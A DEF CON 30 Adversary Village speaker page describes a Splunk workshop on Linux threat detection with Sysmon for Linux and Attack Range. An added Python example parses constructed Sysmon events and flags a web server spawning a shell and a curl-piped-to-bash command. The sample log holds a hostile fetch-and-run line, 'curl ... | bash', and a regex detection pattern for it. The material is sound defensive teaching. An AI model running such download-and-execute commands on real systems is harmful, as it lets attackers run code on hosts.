Adversary Village
DEF CON 30
Speakers

Rod Soto

Researcher at Splunk

Security Researcher at Splunk.

Workshop: Linux Threat Detection with Attack Range
Hands-on Workshop

The release of Microsoft Sysmon for Linux gives defenders new opportunities for monitoring, management and detection development on Linux operating systems. In this hands-on workshop the presenters use the open source Splunk Attack Range to replicate adversarial TTPs on Linux hosts, record and analyze the resulting Sysmon for Linux telemetry, and develop detections based on that data.
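As an added illustration of the detection-development loop the abstract describes (this is not code from the workshop, from Splunk Attack Range, or from the presenter), the following Python example parses a few constructed Sysmon for Linux ProcessCreate events and runs two simple detections over them. It assumes the on-disk shape Sysmon for Linux writes to syslog, a syslog prefix followed by one XML `<Event>` per line with Windows-Sysmon-style `Data Name="..."` fields; the host names, user names, IP address, process names and the two rule names are all made up for the example, and in the workshop setting the equivalent logic would be expressed as Splunk searches over the ingested events rather than as Python.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample lines (not real captures) in the shape Sysmon for Linux
# writes to syslog: a syslog prefix, then one XML <Event> per line. EventID 1
# is ProcessCreate; EventID 3 is NetworkConnect. Field names follow the
# Sysmon event schema; host, users and the IP (from the documentation range
# 198.51.100.0/24) are invented.
SAMPLE_LOG = r"""
Mar  1 12:00:01 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>web01</Computer></System><EventData><Data Name="Image">/usr/bin/ls</Data><Data Name="CommandLine">ls -la /var/www</Data><Data Name="ParentImage">/usr/bin/bash</Data><Data Name="User">deploy</Data></EventData></Event>
Mar  1 12:00:02 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>web01</Computer></System><EventData><Data Name="Image">/usr/bin/bash</Data><Data Name="CommandLine">bash -c "id"</Data><Data Name="ParentImage">/usr/sbin/php-fpm8.1</Data><Data Name="User">www-data</Data></EventData></Event>
Mar  1 12:00:03 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>1</EventID><Computer>web01</Computer></System><EventData><Data Name="Image">/usr/bin/bash</Data><Data Name="CommandLine">bash -c "curl -s http://198.51.100.7/x.sh | bash"</Data><Data Name="ParentImage">/usr/bin/bash</Data><Data Name="User">deploy</Data></EventData></Event>
Mar  1 12:00:04 web01 sysmon: <Event><System><Provider Name="Linux-Sysmon"/><EventID>3</EventID><Computer>web01</Computer></System><EventData><Data Name="Image">/usr/bin/curl</Data><Data Name="DestinationIp">198.51.100.7</Data></EventData></Event>
"""

# Hypothetical rule parameters: web server binaries whose children should
# never be an interactive shell, and the shells we care about.
WEB_SERVERS = ("nginx", "apache2", "httpd", "php-fpm")
SHELLS = ("sh", "bash", "dash", "zsh")
# "curl ... | bash" / "wget ... | sh" style download-and-execute one-liners.
FETCH_PIPE_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|da|z)?sh\b")


def parse_events(text):
    """Turn syslog lines carrying a Sysmon XML <Event> into flat dicts."""
    events = []
    for line in text.splitlines():
        start = line.find("<Event>")
        if start < 0:
            continue  # not a Sysmon line, ignore
        root = ET.fromstring(line[start:])
        ev = {
            "EventID": int(root.findtext("System/EventID")),
            "Computer": root.findtext("System/Computer", ""),
        }
        # Each <Data Name="X">value</Data> becomes ev["X"].
        for d in root.iterfind("EventData/Data"):
            ev[d.get("Name")] = d.text or ""
        events.append(ev)
    return events


def basename(path):
    return path.rsplit("/", 1)[-1]


def detect(events):
    """Run two ProcessCreate detections; return (rule, host, parent, cmdline) tuples."""
    alerts = []
    for ev in events:
        if ev["EventID"] != 1:
            continue  # only ProcessCreate carries the fields these rules use
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        # Rule 1: a web server worker spawning a shell (typical webshell/RCE follow-on).
        if image in SHELLS and any(parent.startswith(w) for w in WEB_SERVERS):
            alerts.append(("web_server_spawned_shell", ev["Computer"], parent, cmd))
        # Rule 2: remote script fetched and piped straight into a shell.
        if FETCH_PIPE_SHELL.search(cmd):
            alerts.append(("remote_script_piped_to_shell", ev["Computer"], parent, cmd))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse_events(SAMPLE_LOG)):
        print(alert)
```

Running the block prints one alert for the `php-fpm` worker that launched `bash` and one for the `curl ... | bash` command line; the `ls` event and the NetworkConnect event produce nothing. The same two conditions map directly onto searches over the `Image`, `ParentImage` and `CommandLine` fields once the events are indexed, which is the point at which rules like these are tuned against the Attack Range replay.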